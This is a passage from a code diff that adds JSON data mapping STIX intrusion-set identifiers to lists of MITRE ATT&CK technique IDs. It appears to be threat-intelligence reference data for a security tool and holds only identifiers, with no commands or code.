+ { + "mitreAttackId": "attack.t1102" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1562.004" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1027.004" + }, + { + "mitreAttackId": "attack.t1222.002" + }, + { + "mitreAttackId": "attack.t1574.006" + }, + { + "mitreAttackId": "attack.t1053.003" + }, + { + "mitreAttackId": "attack.t1070.006" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1070.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1014" + }, + { + "mitreAttackId": "attack.t1037" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1496" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1543.002" + }, + { + "mitreAttackId": "attack.t1571" + }, + { + "mitreAttackId": "attack.t1552.004" + }, + { + "mitreAttackId": "attack.t1102.001" + }, + { + "mitreAttackId": "attack.t1564.001" + }, + { + "mitreAttackId": "attack.t1021.004" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1071" + }, + { + "mitreAttackId": "attack.t1059.006" + }, + { + "mitreAttackId": "attack.t1055.002" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1059.004" + } + ], + "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542": [ + { + "mitreAttackId": "attack.t1087" + }, + { + "mitreAttackId": "attack.t1482" + }, + { + "mitreAttackId": "attack.t1649" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1584.001" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1566.003" + }, + { + "mitreAttackId": "attack.t1027.001" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1606.002" + }, + { + "mitreAttackId": "attack.t1606.001" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1213.003" + }, + { + "mitreAttackId": "attack.t1199" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1136.003" + }, + { + "mitreAttackId": "attack.t1195.002" + }, + { + "mitreAttackId": "attack.t1098.005" + }, + { + "mitreAttackId": "attack.t1558.003" + }, + { + "mitreAttackId": "attack.t1070" + }, + { + "mitreAttackId": "attack.t1589.001" + }, + { + "mitreAttackId": "attack.t1546.003" + }, + { + "mitreAttackId": "attack.t1098.001" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1098.002" + }, + { + "mitreAttackId": "attack.t1098.003" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1546.008" + }, + { + "mitreAttackId": "attack.t1562.002" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1562.004" + }, + { + "mitreAttackId": "attack.t1074.002" + }, + { + "mitreAttackId": "attack.t1556.007" + }, + { + "mitreAttackId": "attack.t1548.002" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1078.004" + }, + { + "mitreAttackId": "attack.t1048.002" + }, + { + "mitreAttackId": "attack.t1078.002" + }, + { + "mitreAttackId": "attack.t1078.003" + }, + { + "mitreAttackId": "attack.t1027.006" + }, + { + "mitreAttackId": "attack.t1539" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1586.002" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1114.002" + }, + { + "mitreAttackId": "attack.t1003.006" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1095" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.006" + }, + { + "mitreAttackId": "attack.t1016.001" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1568" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1001.002" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1070.006" + }, + { + "mitreAttackId": "attack.t1070.008" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1087.004" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1484.002" + }, + { + "mitreAttackId": "attack.t1552.004" + }, + { + "mitreAttackId": "attack.t1550" + }, + { + "mitreAttackId": "attack.t1595.002" + }, + { + "mitreAttackId": "attack.t1090.004" + }, + { + "mitreAttackId": "attack.t1069.002" + }, + { + "mitreAttackId": "attack.t1555" + }, + { + "mitreAttackId": "attack.t1110.003" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1550.001" + }, + { + "mitreAttackId": "attack.t1090.003" + }, + { + "mitreAttackId": "attack.t1550.004" + }, + { + "mitreAttackId": "attack.t1090.001" + }, + { + "mitreAttackId": "attack.t1550.003" + }, + { + "mitreAttackId": "attack.t1069" + }, + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1621" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1553.005" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1587.003" + }, + { + "mitreAttackId": "attack.t1587.001" + }, + { + "mitreAttackId": "attack.t1213" + }, + { + "mitreAttackId": "attack.t1573" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1021.006" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1555.003" + } + ], + "intrusion-set--894aab42-3371-47b1-8859-a4a074c804c8": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1573.001" + }, + { + "mitreAttackId": "attack.t1059" + }, + { + "mitreAttackId": "attack.t1012" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1555" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1555.004" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1082" + } + ], + "intrusion-set--5636b7b3-d99b-4edd-aa05-ee649c1d4ef1": [ + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1071.001" + } + ], + "intrusion-set--d0b3393b-3bec-4ba3-bda9-199d30db47b6": [ + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1056.002" + }, + { + "mitreAttackId": "attack.t1564.008" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1114.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1090.003" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1056.001" + } + ], + "intrusion-set--9e729a7e-0dd6-4097-95bf-db8d64911383": [ + { + "mitreAttackId": "attack.t1124" + }, + { + "mitreAttackId": "attack.t1573.001" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1497" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1497.001" + }, + { + "mitreAttackId": "attack.t1497.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1080" + }, + { + "mitreAttackId": "attack.t1091" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--32bca8ff-d900-4877-aa65-d70baa041b74": [ + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1552.001" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1110.003" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1555" + }, + { + "mitreAttackId": "attack.t1136.001" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1114.002" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1003.004" + }, + { + "mitreAttackId": "attack.t1003.005" + }, + { + "mitreAttackId": "attack.t1055.013" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--f9c06633-dcff-48a1-8588-759e7cec5694": [ + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1056.004" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1055" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1094" + }, + { + "mitreAttackId": "attack.t1095" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1518" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1566.003" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1036.001" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1204.002" + } + ], + "intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0": [ + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1032" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1218.007" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1059.006" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--55033a4d-3ffe-46b2-99b4-2c1541e9ce1c": [ + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1219" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1562.004" + } + ], + "intrusion-set--4283ae19-69c7-4347-a35e-b56f08eb660b": [ + { + "mitreAttackId": "attack.t1124" + }, + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1567.002" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1573.001" + }, + { + "mitreAttackId": "attack.t1598" + }, + { + "mitreAttackId": "attack.t1012" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1218.007" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1059.006" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--a7f57cc1-4540-4429-823f-f4e56b8473c9": [ + { + "mitreAttackId": "attack.t1102" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1218.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1588.003" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1027.001" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--76565741-3452-4069-ab08-80c0ea95bbeb": [ + { + "mitreAttackId": "attack.t1071.003" + }, + { + "mitreAttackId": "attack.t1071.002" + }, + { + "mitreAttackId": "attack.t1071.001" + } + ], + "intrusion-set--7f848c02-4d1e-4808-a4ae-4670681370a9": [ + { + "mitreAttackId": "attack.t1559.002" + }, + { + "mitreAttackId": "attack.t1573" + }, + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1568" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1608.001" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1095" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1583.001" + } + ], + "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90": [ + { + "mitreAttackId": "attack.t1124" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1007" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1027.001" + }, + { + "mitreAttackId": "attack.t1036.002" + }, + { + "mitreAttackId": "attack.t1027.003" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1053.002" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1080" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1548.002" + }, + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1113" + }, + { + "mitreAttackId": "attack.t1573.001" + }, + { + "mitreAttackId": "attack.t1102.001" + }, + { + "mitreAttackId": "attack.t1518" + }, + { + "mitreAttackId": "attack.t1132.001" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1039" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1550.003" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.006" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--fe98767f-9df8-42b9-83c9-004b1dec8647": [ + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1588.002" + } + ], + "intrusion-set--a653431d-6a5e-4600-8ad3-609b5af57064": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1218.010" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1546.008" + }, + { + "mitreAttackId": "attack.t1027.005" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1564.003" + }, + { + "mitreAttackId": "attack.t1018" + } + ], + "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1137.006" + }, + { + "mitreAttackId": "attack.t1078.002" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1204.002" + } + ], + "intrusion-set--222fbd21-fc4f-4b7e-9f85-0e6e3a76c33f": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1560" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1106" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1074.002" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1036.003" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1055.012" + }, + { + "mitreAttackId": "attack.t1070.003" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1574.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1210" + }, + { + "mitreAttackId": "attack.t1199" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1021.004" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1218.004" + }, + { + "mitreAttackId": "attack.t1039" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1568.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1090.002" + }, + { + "mitreAttackId": "attack.t1003.004" + }, + { + "mitreAttackId": "attack.t1003.002" + }, + { + "mitreAttackId": "attack.t1003.003" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--d69e568e-9ac8-4c08-b32c-d93b43ba9172": [ + { + "mitreAttackId": "attack.t1048.003" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1219" + }, + { + "mitreAttackId": "attack.t1588.002" + } + ], + "intrusion-set--2e5d3a83-fe00-41a5-9b60-237efc84832f": [ + { + "mitreAttackId": "attack.t1027.001" + } + ], + "intrusion-set--38fd6a28-3353-4f2b-bb2b-459fecd5c648": [ + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1071.004" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1053.002" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1070.004" + } + ], + "intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484": [ + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + } + ], + "intrusion-set--e5603ea8-4c36-40e7-b7af-a077d24fedc1": [ + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1586.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1105" + } + ], + "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1562" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1584.001" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1566.003" + }, + { + "mitreAttackId": "attack.t1087.003" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1070.003" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1113" + }, + { + "mitreAttackId": "attack.t1114" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1595.002" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1564.003" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1136.001" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1071" + }, + { + "mitreAttackId": "attack.t1589.001" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1589.002" + }, + { + "mitreAttackId": "attack.t1098.002" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1065" + }, + { + "mitreAttackId": "attack.t1562.004" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1589" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1571" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1586.002" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1585.001" + }, + { + "mitreAttackId": "attack.t1585.002" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1114.002" + }, + { + "mitreAttackId": "attack.t1114.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1598.003" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb": [ + { + "mitreAttackId": "attack.t1102" + }, + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1560" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1566.003" + }, + { + "mitreAttackId": "attack.t1074.002" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1059" + }, + { + "mitreAttackId": "attack.t1110.002" + }, + { + "mitreAttackId": "attack.t1213" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1134" + }, + { + "mitreAttackId": "attack.t1048.003" + }, + { + "mitreAttackId": "attack.t1572" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1569.002" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1555" + }, + { + "mitreAttackId": "attack.t1560.003" + }, + { + "mitreAttackId": "attack.t1573.002" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1095" + }, + { + "mitreAttackId": "attack.t1003.003" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + 